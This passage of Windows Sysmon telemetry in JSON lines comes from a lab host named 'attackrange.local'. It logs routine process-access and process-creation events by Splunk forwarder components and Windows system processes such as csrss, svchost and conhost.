{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4201,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02F6-5F25-0000-0010AC2F0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02F6-5F25-0000-0010AC2F0600}","TargetProcessId":"4240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4202,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.075\r\nSourceProcessGUID: {A837DB8D-02F6-5F25-0000-0010AC2F0600}\r\nSourceProcessId: 4240\r\nSourceThreadId: 3320\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.075","SourceProcessGUID":"{A837DB8D-02F6-5F25-0000-0010AC2F0600}","SourceProcessId":"4240","SourceThreadId":"3320","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4203,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.436\r\nProcessGuid: {A837DB8D-02F7-5F25-0000-001089310600}\r\nProcessId: 4124\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.436","ProcessGuid":"{A837DB8D-02F7-5F25-0000-001089310600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4204,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02F7-5F25-0000-001089310600}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02F7-5F25-0000-001089310600}","TargetProcessId":"4124","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4205,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02F7-5F25-0000-001089310600}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02F7-5F25-0000-001089310600}","TargetProcessId":"4124","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4206,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4207,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4208,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4209,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:51.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:51.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows